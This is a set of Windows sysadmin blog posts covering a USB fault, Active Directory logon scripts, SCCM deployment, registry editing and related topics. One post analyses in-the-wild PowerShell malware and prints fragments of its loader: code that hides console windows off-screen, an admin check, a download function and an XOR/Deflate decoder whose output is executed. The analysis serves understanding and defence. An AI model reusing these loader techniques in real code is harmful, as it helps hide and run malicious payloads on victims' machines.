Read-Only USB Flash Drive Issue


I came across an interesting issue with a Kingston DataTraveler Micro USB Flash Drive yesterday that I thought worth sharing.

Initially, I spotted an error in the System Event Log – “{Delayed Write Failed} Windows was unable to save all the data for the file … The data has been lost. This error may be caused by a failure of your computer hardware or network connection. Please try to save this file elsewhere.”  Since I hadn’t been yanking USB drives out without formally ejecting them, this was a little concerning.  Here’s the full error:


A scroll through the System Event Log was less than reassuring, with many errors with Source disk and Ntfs:


The error from source disk was “An error was detected on device \Device\Harddisk2\DR7 during a paging operation.”  It’s not immediately clear how to tally “\Device\Harddisk2\DR7” to a physical drive in the PC:
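One way to tally it (a sketch of what I'd try, rather than a step from the original session) is to enumerate the physical drives with WMI, since \\.\PHYSICALDRIVE2 corresponds to \Device\Harddisk2:

```powershell
# List physical drives; the trailing digit of each DeviceID matches the Harddisk number
Get-WmiObject -Class Win32_DiskDrive |
    Select-Object DeviceID, Model, Size |
    Sort-Object DeviceID
```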


The error from source Ntfs was “The system failed to flush data to the transaction log.  Corruption may occur in VolumeId: E:, DeviceName: \Device\HarddiskVolume11. (The I/O device reported an I/O error.)”  That’s a more helpful error as it gives a drive letter that corresponded to one of my USB Flash Drives:


On opening the Disk Management MMC, it can be seen that the Disk number shown on the left side of the GUI that holds the partition bearing this E: drive matches the Harddisk number (2) in the disk event log entry.  So the two errors match up:
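On Windows 8 / Server 2012 or later (where the Storage module is available), the same mapping can be confirmed without the GUI — a sketch:

```powershell
# Map drive letter E: straight to its underlying disk number
Get-Partition -DriveLetter E | Select-Object DiskNumber, DriveLetter, Size
```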


My first thought was to try to scan the drive for any errors and fix them.  The computer then bizarrely claimed that “The disk is write protected.”  This is not the sort of USB Drive that has a physical write-protect switch:


I then wondered if my AntiVirus was interfering, so I tried disabling both it and my AntiExploit software but to no avail.  After some reading around, I discovered that diskpart can be used to view and alter the Read-Only status of a drive via its detail disk command.  I first use list disk to find the ID of the drive (by looking at the Size of the disks) and then I use select disk to set the focus to that drive.  Note that the results include the arrowed lines “Current Read-only State : Yes” and “Read-only : No”:


I had seen examples online where both attributes were set to “Yes” and the recommended fix was to try the command attributes disk clear readonly.  I tried it anyway but it made no difference, with the attributes appearing the same afterwards:
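For reference, the whole diskpart sequence can be run non-interactively from PowerShell by piping a script to it (disk number 2 is just my example — check yours with list disk first):

```powershell
# The here-string is a diskpart script: focus the disk, clear the flag, show the result
@'
select disk 2
attributes disk clear readonly
detail disk
'@ | diskpart.exe
```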


There were also references online on this subject to registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\StorageDevicePolicies having a DWORD value WriteProtect that needed changing from 1 to 0.  I didn’t have this key or value on my system.  At that point I suspected this was almost certainly a hardware failure of some sort, and I confirmed that the drive did not work on a different computer either.
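For completeness, here's a hedged sketch in PowerShell of that fix (untested on my part, since the key wasn't present on my system):

```powershell
# Create the StorageDevicePolicies key if it's missing, then set WriteProtect to 0
$key = 'HKLM:\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies'
if (-not (Test-Path -Path $key)) {
    New-Item -Path $key | Out-Null
}
Set-ItemProperty -Path $key -Name 'WriteProtect' -Value 0 -Type DWord
```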

More Googleage revealed what had happened.  It appears to be a deliberate feature of the drive firmware: when it detects that the drive is having problems, it becomes permanently write-protected to protect the data already on it from further loss.

I contacted Kingston and the end result is that the drive is being replaced under warranty.  I would like to add that this is the second dealing I’ve had with Kingston’s technical support (a different reason previously) and I have found them outstanding both times!





When a user logs onto a domain PC, the authenticating domain controller updates a non-replicated attribute of the user account called lastLogon in its copy of the domain partition.  There is another attribute called lastLogonTimeStamp (since Server 2003) that is replicated but it is not updated on every single logon.  To reduce replication traffic, it is only updated when the value is (by default) 9 to 14 days out of date.  This attribute is designed for assisting detecting stale accounts, not getting a definitive date.  More info is here.
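As a quick illustration of the two attributes side by side (the username jbloggs is just a placeholder):

```powershell
# lastLogonTimestamp is the raw replicated Int64; LastLogonDate is PowerShell's
# translated DateTime version of it
Get-ADUser -Identity 'jbloggs' -Properties lastLogonTimestamp, LastLogonDate |
    Select-Object Name, lastLogonTimestamp, LastLogonDate
```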

Sometimes though, it can be useful to know exactly when a user last logged on.  Here’s a script I wrote today that queries all domain controllers and gets the lastLogon attribute from all of them to find which is the newest and thus the actual last logon.  The attribute is stored as a Windows FILETIME (based on UTC) and so is returned as an Int64.  Interestingly, PowerShell provides a helpful extra property called lastLogonDate that contains a DateTime-translated version of lastLogonTimeStamp.  My script has to do the translation of the lastLogon attribute’s format itself.  See the notes after the script.

function Get-LastLogonDateTime {
#requires -Version 3.0 -Modules ActiveDirectory
    param (
        [Parameter(Mandatory, ValueFromPipeline, HelpMessage='Enter one or more usernames separated by commas.')]
        [string[]]$Username
    )

    BEGIN {
        $DCs = Get-ADDomainController -Filter '*'
    }

    PROCESS {
        foreach ($user in $Username) {
            Write-Verbose ('Processing user "{0}"...' -f $user)
            try {
                Get-ADUser -Identity $user | Out-Null
            } catch {
                Write-Error ('User "{0}" does not exist.' -f $user)
                continue
            }

            [Int64]$lastLogon = 0
            foreach ($DC in $DCs) {
                $domainController = $DC.HostName
                Write-Verbose ('Querying Domain Controller "{0}"...' -f $domainController)
                $dcLastLogon = Get-ADUser -Identity $user -Server $domainController -Properties lastLogon |
                    Select-Object -ExpandProperty lastLogon
                $lastLogon = [Math]::Max($lastLogon, $dcLastLogon)
            }

            $lastLogonDateTime = [DateTime]::FromFileTime($lastLogon)
            $obj = [pscustomobject]@{
                'Username'          = $user
                'LastLogonDateTime' = $lastLogonDateTime
            }
            Write-Output $obj
        }
    }

    END {}
}

When looping through each domain controller in turn, I need to compare the returned lastLogon attribute with what has already been found and just keep track of the newest value.  Since it’s an integer, I merely need to keep the greatest one.  The easiest way to do this is to use the Max(x, y) static method of .NET’s [Math] class, which returns the bigger of two numbers.  I pass it the value from the currently-queried domain controller and the previous biggest value seen.

$lastLogon = [Math]::Max($lastLogon, $dcLastLogon)

On the first time through the loop, the value being compared with is set to 0 but note I had to strongly type the variable holding it as an Int64.

[Int64]$lastLogon = 0

This is because the lastLogon attribute is an Int64 and the Math.Max() method expects the two numbers being compared to be of the same type.  If I’d initialised that $lastLogon variable without strongly typing it, it would have been an Int32 by default, which would make the method call fail.  Yes, I found this out the hard way!

Once the newest value is obtained, the script then converts it to a normal [DateTime] value by using a static method on the [DateTime] class.

$lastLogonDateTime = [DateTime]::FromFileTime($lastLogon)
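As a quick sanity check of the conversion — a FILETIME counts 100-nanosecond intervals since 1 January 1601 (UTC):

```powershell
# Zero ticks is the FILETIME epoch
[DateTime]::FromFileTimeUtc(0)   # 1 January 1601, 00:00:00 UTC

# FromFileTime (no Utc suffix) gives the same instant translated to local time
[DateTime]::FromFileTime(0)
```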

I’ve returned the final value as an object and written the function so it can handle multiple usernames via the parameter or from the pipeline.

I’m considering writing a meatier version 2 that will also try and get the hostname of the computer the user logged on to from the Security log of the domain controller that authenticated them…!

Enabling PowerShell Remoting (Part 2)



Some time ago I wrote a fairly-extensive post about an issue I was seeing with failure to register PowerShell Remoting Endpoints (PSSessionConfigurations) when enabling PSRemoting via Group Policy.

I never did solve the underlying problem.  The eventual script I used is different to the one that’s in the old post, so here is the newer one.  Group Policy handles the Services etc, and then this runs in a Computer Startup Script:

#requires -Version 3
# Add missing PSSessionConfigurations (Remoting Endpoints)

Start-Service -Name 'WinRM'

$faulty = $false

if ((Get-PSSessionConfiguration -Name 'Microsoft.PowerShell' -ErrorAction SilentlyContinue) -eq $null) {
    $faulty = $true
}

if ((@(Get-WmiObject -Class Win32_Processor -Property AddressWidth)[0].AddressWidth) -eq 64) {
    if ((Get-PSSessionConfiguration -Name 'Microsoft.PowerShell32' -ErrorAction SilentlyContinue) -eq $null) {
        $faulty = $true
    }
}

if ($PSVersionTable.PSVersion.Major -ge 3) {
    if ((Get-PSSessionConfiguration -Name 'Microsoft.PowerShell.Workflow' -ErrorAction SilentlyContinue) -eq $null) {
        $faulty = $true
    }
}

if ($faulty) {
    try {
        Enable-PSRemoting -Force -SkipNetworkProfileCheck | Out-Null
    } catch {
        # Retry once if the first attempt fails
        try {
            Enable-PSRemoting -Force -SkipNetworkProfileCheck | Out-Null
        } catch {
        }
    }

    Restart-Service -Name 'WinRM'
}

A Computer Startup PowerShell Script does add to boot time but it’s the best solution I could find that worked consistently without doing anything too weird that might cause future problems.  I hope you find it helpful and if anyone ever finds out what the actual cause of the missing endpoints issue is, please post a comment, thanks!

SQL Restore Issue


Saw an interesting error message today when a colleague was doing a test SQL restore onto a spare server.  Neither of us are SQL people…!  Here’s the error:


We went back to the restore wizard and set its options again but this time clicked the Script button at the top to copy the T-SQL to the clipboard.


The T-SQL was as follows.  I’ve shortened paths, changed names and added line-breaks:

RESTORE DATABASE [dbname]
FROM DISK = N'D:\Restore\MSSQL\Backup\database\backupfilename.bak' WITH FILE = 1,
MOVE N'dbname_SYSTEM' TO N'D:\MSSQL\DATA\dbfilename.mdf',
MOVE N'dbname_DATA' TO N'D:\MSSQL\DATA\dbfilename.mdf',
MOVE N'dbname_INDEX' TO N'D:\MSSQL\DATA\dbfilename.mdf',
MOVE N'dbname_INDEX_2' TO N'D:\MSSQL\DATA\dbfilename.NDF',
MOVE N'dbname_ARCHIVE' TO N'D:\MSSQL\DATA\dbfilename.NDF',
MOVE N'dbname_ARCHIVE_2' TO N'D:\MSSQL\DATA\dbfilename.NDF',
MOVE N'dbname_LOG' TO N'D:\MSSQL\DATA\dbfilename.ldf',
MOVE N'dbname_LOG_2' TO N'D:\MSSQL\DATA\dbfilename.ldf',

From that, you can see multiple parts of the database going to the same destination filename which must explain the error we were getting.
Pasting the T-SQL into a new query and adding suffixes to the stem of those filenames to make them unique let the restore work, and the database tables, when checked, looked fine.

Recognising the NDF file extension as being from Secondary Data Files, I next had a look at what was going on with the disposition of the files on the live database:


As you can see, the files are normally spread over 7 folders on 4 drives but we were restoring the lot for test purposes into one folder and so the filenames were clashing.

Rather than tweak the T-SQL like we did, I see we could just change the destinations in the second page of the Restore wizard next time in the “Restore As” column:



Barcode Printing Bizarreness


We have a third-party web app that as part of its functionality prints labels with barcodes on.  This was working fine until PCs were upgraded to IE11 and then the printed barcodes could no longer be read by a hand-held barcode scanner!  To confirm the behaviour, downgrading IE back to IE9 fixed the problem and upgrading that back to IE11 broke it once more.  Printing from IE11 to a standard Laserjet printer instead of the label printer produced output that could be scanned successfully.

The printer in question is a Toshiba thermal printer that was chosen for its ability to be powered by a rechargeable battery and its ruggedised nature.  Here it is:


It’s using the Seagull Scientific printer drivers from here.  The barcodes are of symbology Code 39.

One thing that was noted was that the printer is only 203 DPI which means it could be at risk of struggling to fit the needed level of detail into a given space if the barcode is below a certain size.  Measuring a scannable and non-scannable printout showed no difference in printed width (I’d wondered if there was some scaling going on in IE11).  Looking really closely at the printout, the non-scannable barcode did look more indistinct on the thinnest black lines but there were also places where the line patterns for repeated character zeros were inconsistent.  It reminded me of what happens when you shrink an image down without resampling – which is presumably something like what is actually going on – though why differing IE versions should affect this was not clear.

Here are some close-ups of part of the printed barcodes where you can see the most obvious difference in the two printouts.

(Close-up comparison images: the working barcode printed from IE9 next to the faulty barcode printed from IE11.)

Today I found this extremely useful webpage.  To quote:

When printing barcodes fonts to a printer with less then 600dpi, such as a thermal 203dpi printer, the print should be no smaller than 20 points. Otherwise, print at the point sizes specified in the chart below.


It is necessary to use the point sizes specified in the chart above with low resolution printers so that there are the exact number of dots required to create the exact ratio of bar and space sequences. Because fonts cannot calculate or perform operations on their own, they have no method to compensate for low resolution devices.

We had a look at the template that was generating the label and the barcode font was 10 point.  Increasing this to 12 to match the chart above did indeed fix the problem!  We also tried 6 but it was too tiny and wouldn’t scan.

Despite the fix, this still left the question of what was different between IE9 and IE11 that could explain it all.  I’m assuming it must be something to do with the rendering engine behaving differently in IE11.  Remembering from past experience that printer drivers interact with graphics drivers made me think about graphics rendering specifically.  Although the following setting also existed in IE9, I tried ticking it on an affected IE11 machine:


That fixed the problem and enabled even a 10 point barcode to print in scannable form from IE11!  I don’t fancy leaving that ticked because of potential performance degradation and unknown issues with other current and future web apps, so we’ll be sticking with 12 point for now.  My next – and probably final – port of call would be to try an updated [on-board] graphics driver.

PowerShell Malware

Saw my first example today of in-the-wild PowerShell malware, on an infected laptop.  It had already been cleaned by MalwareBytes but I looked it over with Process Explorer and Autoruns and spotted a strange Scheduled Task.

The task name was the GUID “{080A7D47-0B0F-0B0B-0511-7D0A7F781109}” which I’m pasting here in case it’s constant for all infected machines.  The task was set to run at 18:01 and run PowerShell with the usual -ExecutionPolicy Bypass and the -EncodedCommand parameter followed by a long string.

I decoded the string with the following:

$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($encoded))
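One thing worth noting: PowerShell's -EncodedCommand parameter actually expects the Base64 of a UTF-16LE (Unicode) string, so if UTF8 decoding produces interleaved null characters, try [System.Text.Encoding]::Unicode instead.  A quick round trip shows the encoding PowerShell itself uses:

```powershell
# Encode a command the way -EncodedCommand expects it, then decode it back
$command = 'Write-Host "hello"'
$encoded = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($command))
$decoded = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($encoded))
$decoded   # gives back the original command string
```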


I put the result in the ISE and then reformatted it to make it readable.  The first thing the script did was set all Preference variables to SilentlyContinue except for the ErrorAction one which it set to Stop.  Next was a particularly interesting bit of code.  I’ve removed two Try-Catch constructs for readability:

function sr($p) {
	New-Item -Path $p | Out-Null
	try {
		New-ItemProperty -Path $p -Name $n -PropertyType DWORD -Value 201329664 | Out-Null
	} catch {
		Set-ItemProperty -Path $p -Name $n -Value 201329664 | Out-Null
	}
}


I’d not really looked at that referenced area of the registry before.  If I look at my own HKEY_CURRENT_USER\Console, I see the following subkeys, which all clearly contain various values to do with console-type window positions, sizes, colours etc:


The piece of code above is creating keys for the PowerShell Console app, svchost.exe and taskeng.exe and then giving them a WindowPosition value of 201329664.  The documentation for that value shows that its high- and low-order 16-bit words determine the window position coordinates.  In hex, that value is 0x0C000C00, and 0x0C00 is decimal 3072.  What this ensures is that if PowerShell or the other processes open a console window, it opens off-screen at coordinates (3072, 3072)!
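The value can be built (or checked) with some simple bit arithmetic — a sketch:

```powershell
# Pack one coordinate into the low word and the other into the high word of the DWORD
$x = 3072
$y = 3072
$windowPosition = ($y -shl 16) -bor $x
'0x{0:X8} = {1}' -f $windowPosition, $windowPosition   # 0x0C000C00 = 201329664
```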

The code next exits if PowerShell is less than v2, or if the OS is older than XP SP2, or if the current user is not an Administrator.  The latter test uses this neat little one-liner:

 if ( -not ( [Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) { break }

Next, there is a long dubious URL in a string which is then passed to the following function to download data from it using the System.Net.WebClient class.  Note the User-Agent header being passed:

function wc($url){
	$rq = New-Object System.Net.WebClient
	$rq.Headers.Add("user-agent","Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1;)")
	return [System.Text.Encoding]::ASCII.GetString($rq.DownloadData($url))
}

The returned data is then decoded from Base64, deobfuscated (Xor) and decompressed with the following function:

function dstr($rawdata){
	$bt = [Convert]::FromBase64String($rawdata)
	$key = $bt[1] -bxor 170
	for ( $i=2; $i -lt $bt.Length; $i++){
		$bt[$i] = ($bt[$i] -bxor (($key + $i) -band 255))
	}
	return ( New-Object IO.StreamReader( New-Object IO.Compression.DeflateStream((New-Object IO.MemoryStream($bt,2,($bt.Length-$ext))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()
}
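To get a feel for those .NET classes, here's a minimal Deflate round trip of my own (nothing to do with the malware's key scheme) — compressing a string, then reading it back the same way dstr does:

```powershell
# Compress a string with DeflateStream...
$text = 'Write-Host "payload"'
$outStream = New-Object IO.MemoryStream
$deflate = New-Object IO.Compression.DeflateStream($outStream, [IO.Compression.CompressionMode]::Compress)
$bytes = [Text.Encoding]::UTF8.GetBytes($text)
$deflate.Write($bytes, 0, $bytes.Length)
$deflate.Close()
$compressed = $outStream.ToArray()

# ...then decompress it with a StreamReader over a DeflateStream, as dstr does
$inStream = New-Object IO.MemoryStream(,$compressed)
$reader = New-Object IO.StreamReader(
    (New-Object IO.Compression.DeflateStream($inStream, [IO.Compression.CompressionMode]::Decompress)))
$reader.ReadToEnd()   # gives back the original string
```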

There’s some rather developery .NET classes in there for me to look up when I’m feeling particularly bored…!

I suspect you can guess how the code ends.  The returned string is passed to Invoke-Expression to be executed to cause the next stage of the infection.

Sadly, the tale ends here, as the URL given no longer has any live code to download.  😦

Preventing SCCM Mid-Install Login Pain



I tend to set many of my SCCM packages to run when no user is logged on.  For example, I don’t want to be trying to update a piece of software if a user might already have the old version open.

Sometimes though, such a package takes some time to run and there’s a chance the user might log in mid-way.  This might not necessarily be a problem – but could be if your package ends by triggering a reboot.  I recently blogged about installing IE11.  There, eight pre-requisite updates had to be installed followed by a reboot before IE11 itself was installed.  That’s quite a time window where a user might log in.  One way around this is to schedule the package for out-of-hours but then if the user doesn’t leave it logged off overnight for a while, any subsequently-advertised packages are held up, waiting for the scheduled one to be run first.

What would be nice is to be able to display a message to the user telling them not to log in while the install is in progress.  It is possible to change the logon/lock screen background, but if this is done via a script while no one is logged in, it won’t visibly take effect until after a reboot.


To do this, make a suitably-sized image no more than 256KB in size and save it as c:\Windows\System32\oobe\info\backgrounds\backgroundDefault.jpg (making any missing folders as required).  Then to make this take effect you need to set a registry value called OEMBackground with a value of 1 within key: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background

For my IE11 installer, the first package to run merely sets the above background and then reboots.  With the background now changed, part two then installs the 8 pre-requisites and reboots.  Part three then does the IEAK-derived install and reboots.  Finally, part four does the RunOnce stuff, applies a cumulative update, removes the above wallpaper and reboots once more!  Total runtime of 15 mins with the warning on-screen throughout.  Anyone who logs in during that time despite the warnings is deserving of any subsequent pain!

Here’s the simple code inside the first package to set the background:

reg.exe add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background /v OEMBackground /t REG_DWORD /d 1 /f >nul
if not exist c:\Windows\System32\oobe\info\backgrounds mkdir c:\Windows\System32\oobe\info\backgrounds
if exist c:\Windows\System32\oobe\info\backgrounds\backgroundDefault.jpg ren c:\Windows\System32\oobe\info\backgrounds\backgroundDefault.jpg backgroundDefault.bak
copy /Y backgroundDefault.jpg c:\Windows\System32\oobe\info\backgrounds\backgroundDefault.jpg >nul

and here’s the code in the last one to remove it again:

reg.exe add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background /v OEMBackground /t REG_DWORD /d 0 /f >nul
del /F c:\Windows\System32\oobe\info\backgrounds\backgroundDefault.jpg >nul
if exist c:\Windows\System32\oobe\info\backgrounds\backgroundDefault.bak ren c:\Windows\System32\oobe\info\backgrounds\backgroundDefault.bak backgroundDefault.jpg

I leave it to SCCM to handle all the rebooting.  You’ll see I’ve coded it to preserve any file already in there, though as far as the registry is concerned, I’m assuming a custom screen isn’t being used.  Also, this hasn’t been written for use with a 64-bit OS where I’d have to work around a 32-bit SCCM 2007 Client process needing access to 64-bit System32 etc.

After initial testing, I found that even users within the IT Department were logging in despite the on-screen message!  They either didn’t read it fully, or just plain ignored it.  I’ve now switched to an ugly in-your-face vivid red screen with a big white font.  Now we’ll probably have people think they’re infected with malware instead…

Upgrading to IE11 with IEAK and SCCM



We’re finally getting to be in a position where we can upgrade more old PCs to IE11.  The problem is, how best to do so via SCCM (2007).  As on previous occasions, we want to use the IEAK to do a little customisation such as stripping out Accelerators, adding a Search Engine, killing off First-Run Wizards, etc.

One thing we found previously when we upgraded to IE9 from IE8, was that after installing an IEAK-derived package and rebooting, you have to log in once as an administrative user for Windows to process some RunOnce settings, as otherwise you end up in a bit of a mess.  We once had to remote to a number of machines just to log in once as admin to complete a failed IEAK v9-based upgrade.  The subsequent fix for later installs was to daisy-chain the IEAK SCCM package with a second package that ran after reboot and used some VBScript to parse the RunOnce registry key and run (and then remove) all the things in there!  Messy but successful.  There’s more info on this issue (which is also seen with OSD) here: “Deploying IE9 with SCCM OSD Task Sequence“.  The RunOnce Runner script I use is based on the mechanism of this one here: “OSD and RunOnce“.  It may be this problem no longer exists with IEAK v11, but I’m playing it safe…

On to IE11 specifically.  I made the usual package with the IEAK and tried it out but it soon became clear (as I half-expected) that it was trying to download and install pre-requisites, but since SCCM packages run under the System context, this was not getting through our web filtering software.  The list of pre-requisites (both required and recommended) is in the following Microsoft KB article: “Prerequisite updates for Internet Explorer 11“.

Reading around some articles online saved me further pain, as it turns out that just installing those updates and then the IEAK package immediately afterwards via a batch file, without an intervening reboot, won’t work as it still goes looking online.  The reference for this is on the Technet forums here: “Packaging IE11 prerequisite updates with IEAK”.

There’s also a nice fix in that discussion for an install of IE11 and pre-requisites without an intervening reboot, for if you’re using the normal IE installer and not an IEAK-derived one.  On the same subject, see also Microsoft’s KB article here: “How to create an all-inclusive deployment package for Internet Explorer 11“.

My solution is three SCCM packages that run one after the other with a reboot after each.  The third is the one that is actually advertised to the PCs and it contains the setting to make it run package two first and that in turn contains the setting to run package one!  Part 1 is the pre-requisite patches and a reboot.  Part 2 is the IEAK package and a reboot.  Part 3 is the RunOnce Runner followed by an IE cumulative update and a final reboot!!

I discovered one complication with the above solution.  If the pre-requisites package tries to install a patch that is already installed, this returns an error which makes SCCM count package one as having failed and then doesn’t attempt to run parts two and three.  I therefore use an explicit exit 0 to end the first batch file.  I’m also letting SCCM handle the reboots, rather than putting a shutdown.exe command in.

The packages will be set to run when no user is logged on and I suspect we will set it for out-of-hours too.  Longer term, I hope we can just push out the pre-requisites with WSUS separately and then deploy a simpler IEAK-based installer with SCCM.

Here is the batch code I’ve used.  Note I’ve copied in filever.exe to look for an already-upgraded IE.  I also use it in the final package to look for a failed upgrade and force a specific return code to flag that up in the SCCM advertisement report.

Package 1:

rem Exit if already has IE11.
filever.exe /B /A /D "C:\Program Files\Internet Explorer\iexplore.exe" | find " 11." >nul
if '%errorlevel%'=='0' exit 0

rem Install pre-requisites.
wusa.exe Windows6.1-KB2533623-x86.msu /quiet /norestart
wusa.exe Windows6.1-KB2639308-x86.msu /quiet /norestart
wusa.exe Windows6.1-KB2670838-x86.msu /quiet /norestart
wusa.exe Windows6.1-KB2729094-v2-x86.msu /quiet /norestart
wusa.exe Windows6.1-KB2731771-x86.msu /quiet /norestart
wusa.exe Windows6.1-KB2786081-x86.msu /quiet /norestart
wusa.exe Windows6.1-KB2834140-v2-x86.msu /quiet /norestart
wusa.exe Windows6.1-KB2882822-x86.msu /quiet /norestart
wusa.exe Windows6.1-KB2888049-x86.msu /quiet /norestart

exit 0

Package 2:

rem Exit if already has IE11.
filever.exe /B /A /D "C:\Program Files\Internet Explorer\iexplore.exe" | find " 11." >nul
if '%errorlevel%'=='0' exit 0

rem Install IEAK package.
start /wait msiexec.exe /i IE11-Setup-Full-x86.msi /quiet /norestart

exit 0

Package 3:

rem Return an error if upgrade has been unsuccessful.
filever.exe /B /A /D "C:\Program Files\Internet Explorer\iexplore.exe" | find " 11." >nul
if '%errorlevel%'=='1' exit 666

rem Run the IEAK Run-Once tasks as admin.
c:\Windows\System32\cscript.exe //nologo RunOnceRunner.vbe

rem Apply May 2016 cumulative update.
c:\Windows\System32\wusa.exe IE11-Windows6.1-KB3154070-x86.msu /quiet /norestart

exit 0

I hope all the above proves useful for someone else!

The word “package” in this article has been sponsored by Alex Davies…

Editing Multi-String Registry Values



I was writing a function earlier to uninstall GearASPI which iTunes always insists on putting on my machine.  The GEAR website has a list of manual steps but no uninstaller.  One of the steps which will be familiar to anyone who has had to fight with disappearing CD drives in the past is to edit the UpperFilters multi-string registry value.  This used to be a relatively common problem caused by various pieces of CD-writing software that didn’t play nicely together.  Advice was often to just delete the UpperFilters and LowerFilters values to restore CD drive functionality but that would affect all software that had altered those keys and not just the one that was playing badly.  The GEAR site wisely says to edit the values if they’re present rather than deleting them.  So the question becomes, how to safely edit a registry Multi-String value (REG_MULTI_SZ) from PowerShell.

The Registry PSProvider has always confused me with its keys being Items and its values being ItemProperties.  Here was what I started with:

$regKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Class\{4d36e965-e325-11ce-bfc1-08002be10318}'
$upperFilters = Get-ItemProperty -Path $regKey -Name 'UpperFilters'

Viewing the returned variable gives us the following:

UpperFilters : {GearASPIwdm}
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4d36e965-e325-11ce-bfc1-08002be10318}
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class
PSChildName : {4d36e965-e325-11ce-bfc1-08002be10318}
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry

That’s not really very helpful so I tried two ways of getting at the actual value:

Get-ItemProperty -Path $regKey -Name 'UpperFilters' | Select-Object -ExpandProperty 'UpperFilters'
(Get-ItemProperty -Path $regKey -Name 'UpperFilters').UpperFilters

My UpperFilters value only contained a single string.  In this case, the first technique returned a [string] whereas the second one returned the desired [string[]].

If the registry value contains no strings, the first technique errors because null is returned and the second technique gives [string[]] again as desired.

I always want [string[]] so technique two looks safe.  Next comes the problem of how to remove a given value from a string array.

Having looked at the methods of the returned variable, I tried .Remove():

$newUpperFilters = $upperFilters.Remove("gearaspiwdm")

That was less than useful:

Exception calling "Remove" with "1" argument(s): "Collection was of a fixed size."

One method I tried yesterday to get around this was casting the original Get-ItemProperty to an [ArrayList] and using its .Remove() method:

[System.Collections.ArrayList]$upperFilters = (Get-ItemProperty -Path $regKey -Name 'UpperFilters').UpperFilters
$newUpperFilters = $upperFilters.Remove('gearaspiwdm')

Oddly, that’s working for me today but yesterday I was finding that the .Remove() was being case-sensitive!  I therefore went on to other things.  This is what I ended up with:

$newUpperFilters = $upperFilters | Where-Object { $_ -ne 'gearaspiwdm' }

That successfully removed the desired string but if there were no other strings left, I ended up with a null to deal with.  I wanted to always get a [string[]] back.

I tried various ways of casting the result:

[string[]]$newUpperFilters = $upperFilters | Where-Object { $_ -ne 'gearaspiwdm' }
[Array]$newUpperFilters = $upperFilters | Where-Object { $_ -ne 'gearaspiwdm' }
$newUpperFilters = [string[]]($upperFilters | Where-Object { $_ -ne 'gearaspiwdm' })
$newUpperFilters = [Array]($upperFilters | Where-Object { $_ -ne 'gearaspiwdm' })
$newUpperFilters = @($upperFilters | Where-Object { $_ -ne 'gearaspiwdm' })

Out of all of those, only the last entry always returned a collection, even when removal of the matching string left nothing; the others return null in that case, whereas @() gives back an [object[]].  Though not actually necessary, that can be converted into a string array with a simple cast:

[string[]]$newUpperFilters = @($upperFilters | Where-Object { $_ -ne 'gearaspiwdm' })

Whilst writing this up today, I realised that there was a much easier method that would always return a [string[]]:

[string[]]$newUpperFilters = $upperFilters -notmatch 'gearaspiwdm'


Note that my final function included Test-Path on registry keys and a Remove-ItemProperty if the UpperFilters ended up empty (based on the .Count property of $newUpperFilters).
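The end of the function then looked roughly like this (a sketch of that logic, with $regKey and $newUpperFilters as above):

```powershell
if ($newUpperFilters.Count -gt 0) {
    # Write the edited multi-string back
    Set-ItemProperty -Path $regKey -Name 'UpperFilters' -Value $newUpperFilters
} else {
    # Nothing left in the multi-string, so remove the value entirely
    Remove-ItemProperty -Path $regKey -Name 'UpperFilters'
}
```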

Now I’m off to re-consult Bruce Payette’s bible and see what he says about Type conversion.  I think I understand the difference between all those casts I tried above…


Having now done some reading, one thing that was seemingly clarified for me is why @() behaves differently to [Array] in ensuring I always got a collection back.

The clue was Bruce’s name for @( … ) as an “Array Subexpression”.  I guess its physical similarity to the subexpression $( … ) should have been a clue.  Apparently @( … ) is equivalent to [object[]] $( … )

Except when I tested this, I didn’t see the same behaviour!

@(([string[]]'Test') | where {$_ -ne 'Test'}).GetType().Name

That returns “Object[]”.

[object[]]$(([string[]]'Test') | where {$_ -ne 'Test'}).GetType().Name

That returns an error due to null being returned:

You cannot call a method on a null-valued expression.

I remain confused!!

RAM Leak on Windows 10

Someone online was telling me earlier that they needed more RAM in their new Windows 10 machine despite already having 16GB in their system.  Their RAM use in Task Manager’s Performance tab was in the order of 15GB (even when idle) but the Details tab did not show any one process with more than around 150MB used.

I talked them through running Sysinternals RAMMap.  On the screenshot they sent, the Non-Paged Pool portion of the histogram was massive.  Here’s a close-up showing the figures:


This suggested a duff driver and enabled me to do a more meaningful Google search on the issue.  There were a number of hits describing the same problem, all pointing the finger at the same cause.  Here’s one such page.

As in those reports, they did indeed have an MSI motherboard with Killer networking.  After a driver update from here, the problem went away.  Plan B would have been to disable the Network Data Usage Monitoring service with a reghack, as suggested by the sites I found.
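For reference, the Plan B reghack those sites suggest sets the Ndu driver's Start value to 4 (disabled) — hedged, as I didn't need it in the end and haven't tested it myself:

```powershell
# 4 = Disabled; a reboot is needed for the change to take effect
Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\Ndu' -Name 'Start' -Value 4
```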